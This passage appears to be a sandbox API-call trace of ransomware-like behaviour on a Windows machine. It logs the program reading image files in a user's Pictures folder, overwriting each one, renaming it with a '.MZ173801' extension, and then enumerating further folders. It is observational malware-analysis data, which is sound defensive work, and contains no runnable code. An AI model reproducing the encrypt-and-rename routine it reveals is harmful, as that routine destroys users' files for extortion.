lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0114.979] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", cchWideChar=814, lpMultiByteStr=0x242762c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==", lpUsedDefaultChar=0x0) returned 814 [0114.979] GetCurrentThreadId () returned 0x1358 [0114.979] GetCurrentThreadId () returned 0x1358 [0114.979] GetCurrentThreadId () returned 0x1358 [0114.980] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 814 [0114.980] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", cchWideChar=814, lpMultiByteStr=0x242799c, cbMultiByte=814, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==", lpUsedDefaultChar=0x0) returned 814 [0114.980] GetCurrentThreadId () returned 0x1358 [0114.980] GetCurrentThreadId () returned 0x1358 [0114.980] GetCurrentThreadId () returned 0x1358 [0114.980] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\uoWC-.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\uowc-.jpg"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0114.980] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f9a4*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f9a4*=0) returned 0x0 [0114.980] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0114.980] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x7a7 [0114.980] SetFilePointer (in: hFile=0x3f8, lDistanceToMove=0, lpDistanceToMoveHigh=0x19f99c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19f99c*=0) returned 0x0 [0114.981] ReadFile (in: hFile=0x3f8, lpBuffer=0x2431b30, nNumberOfBytesToRead=0x7a7, lpNumberOfBytesRead=0x19f9b0, lpOverlapped=0x0 | out: lpBuffer=0x2431b30*, lpNumberOfBytesRead=0x19f9b0*=0x7a7, lpOverlapped=0x0) returned 1 [0114.981] CloseHandle (hObject=0x3f8) returned 1 [0114.981] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\uoWC-.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\uowc-.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3f8 [0114.982] WriteFile (in: hFile=0x3f8, lpBuffer=0x2433b60*, nNumberOfBytesToWrite=0x7a7, lpNumberOfBytesWritten=0x19f9bc, lpOverlapped=0x0 | out: lpBuffer=0x2433b60*, lpNumberOfBytesWritten=0x19f9bc*=0x7a7, lpOverlapped=0x0) returned 1 [0114.983] CloseHandle (hObject=0x3f8) returned 1 [0114.987] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Pictures\\uoWC-.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\uowc-.jpg"), lpNewFileName="C:\\Users\\FD1HVy\\Pictures\\uoWC-.jpg.MZ173801" (normalized: "c:\\users\\fd1hvy\\pictures\\uowc-.jpg.mz173801")) returned 1 [0114.988] GetCurrentThreadId () returned 0x1358 [0114.988] GetCurrentThreadId () returned 0x1358 [0114.988] GetCurrentThreadId () returned 0x1358 [0114.988] GetCurrentThreadId () returned 0x1358 [0114.988] GetCurrentThreadId () returned 0x1358 [0114.988] GetCurrentThreadId () returned 0x1358 [0114.988] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bad1db0, ftCreationTime.dwHighDateTime=0x1d5ebf6, ftLastAccessTime.dwLowDateTime=0x6f5623b0, ftLastAccessTime.dwHighDateTime=0x1d5ed15, ftLastWriteTime.dwLowDateTime=0x6f5623b0, ftLastWriteTime.dwHighDateTime=0x1d5ed15, nFileSizeHigh=0x0, nFileSizeLow=0x7a7, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="uoWC-.jpg", cAlternateFileName="")) returned 0 [0114.988] GetLastError () returned 0x12 [0114.988] FindClose (in: hFindFile=0xa1b738 | out: hFindFile=0xa1b738) returned 1 [0114.988] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\*.*", lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa5cf2f26, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa5cf2f26, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xa1b738 [0114.988] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa60 | out: lpLocalFileTime=0x19fa60) returned 1 [0114.988] FileTimeToDosDateTime (in: lpFileTime=0x19fa60, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0114.988] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xa5cf2f26, ftLastAccessTime.dwHighDateTime=0x1d5fb6e, ftLastWriteTime.dwLowDateTime=0xa5cf2f26, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0114.988] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0114.988] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0114.988] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7a378aa0, ftCreationTime.dwHighDateTime=0x1d5e44e, ftLastAccessTime.dwLowDateTime=0xce529900, ftLastAccessTime.dwHighDateTime=0x1d5e8b2, ftLastWriteTime.dwLowDateTime=0xa4e326bf, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x15a20, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="-116L1WcvYJmv_lb Zj-.bmp.MZ173801", cAlternateFileName="-116L1~1.MZ1")) returned 1 [0114.988] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0114.988] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0114.988] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1bba07a0, ftCreationTime.dwHighDateTime=0x1d5e4f3, ftLastAccessTime.dwLowDateTime=0x7dd84450, ftLastAccessTime.dwHighDateTime=0x1d5e96d, ftLastWriteTime.dwLowDateTime=0xa4e326bf, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0xe6b1, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="2n q.bmp.MZ173801", cAlternateFileName="2NQBMP~1.MZ1")) returned 1 [0114.988] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0114.988] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0114.988] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa91d9d10, ftCreationTime.dwHighDateTime=0x1d5e9cf, ftLastAccessTime.dwLowDateTime=0xd8632cb0, ftLastAccessTime.dwHighDateTime=0x1d5e520, ftLastWriteTime.dwLowDateTime=0xa52849eb, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x10561, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="7L1WKCQLeheP.jpg.MZ173801", cAlternateFileName="7L1WKC~1.MZ1")) returned 1 [0114.988] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0114.988] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0114.988] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x60738ed0, ftCreationTime.dwHighDateTime=0x1d5ede4, ftLastAccessTime.dwLowDateTime=0x291e4990, ftLastAccessTime.dwHighDateTime=0x1d5ec2a, ftLastWriteTime.dwLowDateTime=0xa52849eb, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x24ca, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="8nrtvJPSXWSOarKar.png.MZ173801", cAlternateFileName="8NRTVJ~1.MZ1")) returned 1 [0114.988] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0114.988] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0114.989] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88fdf200, ftCreationTime.dwHighDateTime=0x1d5ebf0, ftLastAccessTime.dwLowDateTime=0x7821fe90, ftLastAccessTime.dwHighDateTime=0x1d5ec45, ftLastWriteTime.dwLowDateTime=0xa531d3f5, ftLastWriteTime.dwHighDateTime=0x1d5fb6e, nFileSizeHigh=0x0, nFileSizeLow=0x4fae, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Bsuy48bD0S.png.MZ173801", cAlternateFileName="BSUY48~1.MZ1")) returned 1 [0114.989] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0114.989] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0114.989] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4988e787, dwReserved1=0x0, cFileName="Camera Roll", cAlternateFileName="CAMERA~1")) returned 1 [0114.989] FileTimeToLocalFileTime (in: lpFileTime=0x19fafc, lpLocalFileTime=0x19fa5c | out: lpLocalFileTime=0x19fa5c) returned 1 [0114.989] FileTimeToDosDateTime (in: lpFileTime=0x19fa5c, lpFatDate=0x19faca, lpFatTime=0x19fac8 | out: lpFatDate=0x19faca, lpFatTime=0x19fac8) returned 1 [0114.989] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\*.*", lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName=".", cAlternateFileName="")) returned 0xa1bab8 [0114.989] FindNextFileW (in: hFindFile=0xa1bab8, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="..", cAlternateFileName="")) returned 1 [0114.989] FindNextFileW (in: hFindFile=0xa1bab8, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51278b1d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0114.990] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f794 | out: lpLocalFileTime=0x19f794) returned 1 [0114.990] FileTimeToDosDateTime (in: lpFileTime=0x19f794, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0114.990] FindNextFileW (in: hFindFile=0xa1bab8, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51278b1d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0114.990] GetLastError () returned 0x12 [0114.990] FindClose (in: hFindFile=0xa1bab8 | out: hFindFile=0xa1bab8) returned 1 [0114.990] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\Camera Roll\\*.*", lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName=".", cAlternateFileName="")) returned 0xa1bc40 [0114.990] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f794 | out: lpLocalFileTime=0x19f794) returned 1 [0114.990] FileTimeToDosDateTime (in: lpFileTime=0x19f794, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0114.990] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0xd45b4543, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="..", cAlternateFileName="")) returned 1 [0114.990] FileTimeToLocalFileTime (in: lpFileTime=0x19f830, lpLocalFileTime=0x19f790 | out: lpLocalFileTime=0x19f790) returned 1 [0114.990] FileTimeToDosDateTime (in: lpFileTime=0x19f790, lpFatDate=0x19f7fe, lpFatTime=0x19f7fc | out: lpFatDate=0x19f7fe, lpFatTime=0x19f7fc) returned 1 [0114.990] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51278b1d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0114.990] FindNextFileW (in: hFindFile=0xa1bc40, lpFindFileData=0x19f81c | out: lpFindFileData=0x19f81c*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x51278b1d, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x51278b1d, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x51278b1d, ftLastWriteTime.dwHighDateTime=0x1d32715, nFileSizeHigh=0x0, nFileSizeLow=0xbe, dwReserved0=0x1, dwReserved1=0x19f87c, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0114.990] GetLastError () returned 0x12 [0114.990] FindClose (in: hFindFile=0xa1bc40 | out: hFindFile=0xa1bc40) returned 1 [0114.990] FindNextFileW (in: hFindFile=0xa1b738, lpFindFileData=0x19fae8 | out: lpFindFileData=0x19fae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8c6a54e0, ftCreationTime.dwHighDateTime=0x1d5e490, ftLastAccessTime.dwLowDateTime=0x128508a0, ftLastAccessTime.dwHighDateTime=0x1d5e90e, 